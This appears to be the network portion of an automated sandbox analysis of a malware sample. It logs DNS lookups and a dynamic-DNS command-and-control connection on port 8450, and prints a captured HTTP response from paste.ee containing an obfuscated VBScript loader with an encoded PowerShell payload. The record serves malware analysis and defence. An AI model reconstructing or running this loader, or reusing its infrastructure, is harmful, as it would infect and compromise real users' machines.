                                                                                        Apr 23, 2024 07:53:35.875742912 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:35.876296997 CEST44349732116.206.104.215192.168.2.5
                                                                                        Apr 23, 2024 07:53:35.876430988 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:35.918159962 CEST44349732116.206.104.215192.168.2.5
                                                                                        Apr 23, 2024 07:53:35.918283939 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:36.221430063 CEST44349732116.206.104.215192.168.2.5
                                                                                        Apr 23, 2024 07:53:36.221550941 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:36.221577883 CEST44349732116.206.104.215192.168.2.5
                                                                                        Apr 23, 2024 07:53:36.221636057 CEST44349732116.206.104.215192.168.2.5
                                                                                        Apr 23, 2024 07:53:36.221667051 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:36.221916914 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:36.222042084 CEST49732443192.168.2.5116.206.104.215
                                                                                        Apr 23, 2024 07:53:46.036525011 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:53:46.207175016 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:53:46.207401037 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:53:46.325066090 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:53:46.548805952 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:53:50.064028025 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:53:50.206432104 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:53:58.364581108 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:53:58.579875946 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:10.395255089 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:10.610603094 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:20.048758030 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:20.222853899 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:22.429666996 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:22.642241001 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:34.461417913 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:34.673216105 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:46.807343960 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:47.032932043 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:50.048856020 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:50.254137993 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:56.846354961 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:57.057758093 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:57.057862043 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:57.267904997 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:57.268124104 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:57.486449957 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:57.486718893 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:57.697215080 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:54:58.748322010 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:54:58.970797062 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:00.851083994 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:01.064199924 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:01.064304113 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:01.284141064 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:01.284229040 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:01.501292944 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:01.660531044 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:01.892760038 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:07.139513969 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:07.349490881 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:09.368752956 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:09.580851078 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:09.580965996 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:09.798445940 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:09.798567057 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:10.017143011 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:10.823354959 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:11.048712015 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:11.166055918 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:11.376993895 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:11.377047062 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:11.588764906 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:11.593589067 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:11.814121962 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:15.615044117 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:15.830676079 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:17.817730904 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:18.032746077 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:20.064497948 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:20.129724979 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:22.054442883 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:22.267745972 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:22.454997063 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:22.673574924 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:22.673654079 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:22.891915083 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:22.892072916 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:23.110466957 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:26.760220051 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:26.970719099 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:27.973048925 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:28.189274073 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:28.773715973 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:28.984639883 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:31.477385998 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:31.689115047 CEST845049735134.255.217.251192.168.2.5
                                                                                        Apr 23, 2024 07:55:38.794173002 CEST497358450192.168.2.5134.255.217.251
                                                                                        Apr 23, 2024 07:55:39.017469883 CEST845049735134.255.217.251192.168.2.5
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Apr 23, 2024 07:53:22.989120960 CEST5828453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:23.077950001 CEST53582841.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:26.746856928 CEST5026753192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:26.836596966 CEST53502671.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:33.624789000 CEST5223253192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:34.160691977 CEST53522321.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:36.650755882 CEST4941453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:37.660680056 CEST4941453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:38.690622091 CEST4941453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:40.676469088 CEST4941453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:40.742151022 CEST53494141.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:40.742167950 CEST53494141.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:40.742244005 CEST53494141.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:40.764601946 CEST53494141.1.1.1192.168.2.5
                                                                                        Apr 23, 2024 07:53:45.429260969 CEST5988453192.168.2.51.1.1.1
                                                                                        Apr 23, 2024 07:53:46.033052921 CEST53598841.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Apr 23, 2024 07:53:22.989120960 CEST192.168.2.51.1.1.10xa8a2Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:26.746856928 CEST192.168.2.51.1.1.10x2f48Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:33.624789000 CEST192.168.2.51.1.1.10x8f06Standard query (0)pantherropes.comA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:36.650755882 CEST192.168.2.51.1.1.10x6bf9Standard query (0)aprilxrwonew8450.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:37.660680056 CEST192.168.2.51.1.1.10x6bf9Standard query (0)aprilxrwonew8450.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:38.690622091 CEST192.168.2.51.1.1.10x6bf9Standard query (0)aprilxrwonew8450.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:40.676469088 CEST192.168.2.51.1.1.10x6bf9Standard query (0)aprilxrwonew8450.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:45.429260969 CEST192.168.2.51.1.1.10xd79cStandard query (0)aprilxrwonew8450.duckdns.orgA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Apr 23, 2024 07:53:23.077950001 CEST1.1.1.1192.168.2.50xa8a2No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:23.077950001 CEST1.1.1.1192.168.2.50xa8a2No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:26.836596966 CEST1.1.1.1192.168.2.50x2f48No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:26.836596966 CEST1.1.1.1192.168.2.50x2f48No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:34.160691977 CEST1.1.1.1192.168.2.50x8f06No error (0)pantherropes.com116.206.104.215A (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:40.742151022 CEST1.1.1.1192.168.2.50x6bf9Server failure (2)aprilxrwonew8450.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:40.742167950 CEST1.1.1.1192.168.2.50x6bf9Server failure (2)aprilxrwonew8450.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:40.742244005 CEST1.1.1.1192.168.2.50x6bf9Server failure (2)aprilxrwonew8450.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:40.764601946 CEST1.1.1.1192.168.2.50x6bf9Server failure (2)aprilxrwonew8450.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                        Apr 23, 2024 07:53:46.033052921 CEST1.1.1.1192.168.2.50xd79cNo error (0)aprilxrwonew8450.duckdns.org134.255.217.251A (IP address)IN (0x0001)false
                                                                                        • paste.ee
                                                                                        • uploaddeimagens.com.br
                                                                                        • pantherropes.com
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549728172.67.187.2004432624C:\Windows\System32\wscript.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-04-23 05:53:23 UTC319OUTGET /d/FIwXa HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-ch
                                                                                        UA-CPU: AMD64
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                        Host: paste.ee
                                                                                        Connection: Keep-Alive
                                                                                        2024-04-23 05:53:23 UTC1232INHTTP/1.1 200 OK
                                                                                        Date: Tue, 23 Apr 2024 05:53:23 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=2592000
                                                                                        strict-transport-security: max-age=63072000
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1; mode=block
                                                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlqRCVX4nxswRKO1mqrRk907Ntj57zJeoVq7bdmitQv1gPsngtMUYlapNzmXD4PK%2B4GNFGV75TelHmazru6QRklEcErjXbImic1hLpxOG5TkE79%2FZJnugHJR6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 878b97c9af3f7d1e-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-04-23 05:53:23 UTC137INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 73 74 72 69 67 65 20 2c 20 63 61 6c 6f 6e 64 72 6f 20 2c 20 69 72 69 73 74 6f 6d 69 61 20 2c 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 2c 20 73 75 6d 65 6c 67 61 20 2c 20 43 61 6d 61 20 2c 20 73 75 6d 65 6c 67 61 31 0d 0a 20 20 20 20 20 63 61 6c 6f 6e 64 72 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 69 72 69 73 74 6f 6d 69 61 20 20 3d 20 22 22 20 26 20 6d 61
                                                                                        Data Ascii: 1f7f dim estrige , calondro , iristomia , matozinhos , sumelga , Cama , sumelga1 calondro = " " iristomia = "" & ma
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72
                                                                                        Data Ascii: tozinhos & calondro & matozinhos & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTr
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6d 61 74
                                                                                        Data Ascii: HQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & matozinhos & calondro & matozinhos & "gBvDgTreHIDgTre" & mat
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 75 44 67 54 72 65
                                                                                        Data Ascii: TregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & matozinhos & calondro & matozinhos & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & matozinhos & calondro & matozinhos & "QBuDgTre
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4d 77 44 67 54 72 65 35 44 67 54 72 65 44 51 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 43 44 67 54 72 65
                                                                                        Data Ascii: DgTreHDgTreDgTre" & matozinhos & calondro & matozinhos & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & matozinhos & calondro & matozinhos & "QBCDgTre
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 67 54 72 65 63 77 42 30 44 67 54 72 65 47 45 44 67 54 72 65 63 67 42 30 44 67 54 72 65 45 59 44 67 54 72 65 62 44 67 54 72 65 42 68 44 67 54 72 65 47 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 38 44 67 54 72 65 44 77 44 67 54 72 65 51 67 42 42 44 67 54 72 65 46 4d 44 67 54 72 65 52 51 44 67 54 72 65 32 44 67 54 72 65 44 51 44 67 54 72 65 58 77 42 54 44 67 54 72 65 46 51 44 67 54 72 65 51 51 42 53 44 67 54 72 65 46 51 44 67 54 72 65 50 67 44 67 54 72 65 2b 44 67 54 72 65 43 63 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51
                                                                                        Data Ascii: gTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTre" & matozinhos & calondro & matozinhos & "Q
                                                                                        2024-04-23 05:53:23 UTC1089INData Raw: 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 34 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 77 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 51 42 68 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65
                                                                                        Data Ascii: gTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTre" & matozinhos & calondro & matozinhos & "DgTreDgTregDgTreCQDgTre
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 31 34 66 31 0d 0a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 34 44 67 54 72 65 44 73 44 67 54 72
                                                                                        Data Ascii: 14f1inhos & calondro & matozinhos & "DgTreBJDgTreG4DgTre" & matozinhos & calondro & matozinhos & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QB4DgTreDsDgTr
                                                                                        2024-04-23 05:53:23 UTC1369INData Raw: 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 74 44 67 54 72 65 43 34 44 67 54 72 65 55 67 42
                                                                                        Data Ascii: TreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre" & matozinhos & calondro & matozinhos & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTre" & matozinhos & calondro & matozinhos & "QBtDgTreC4DgTreUgB
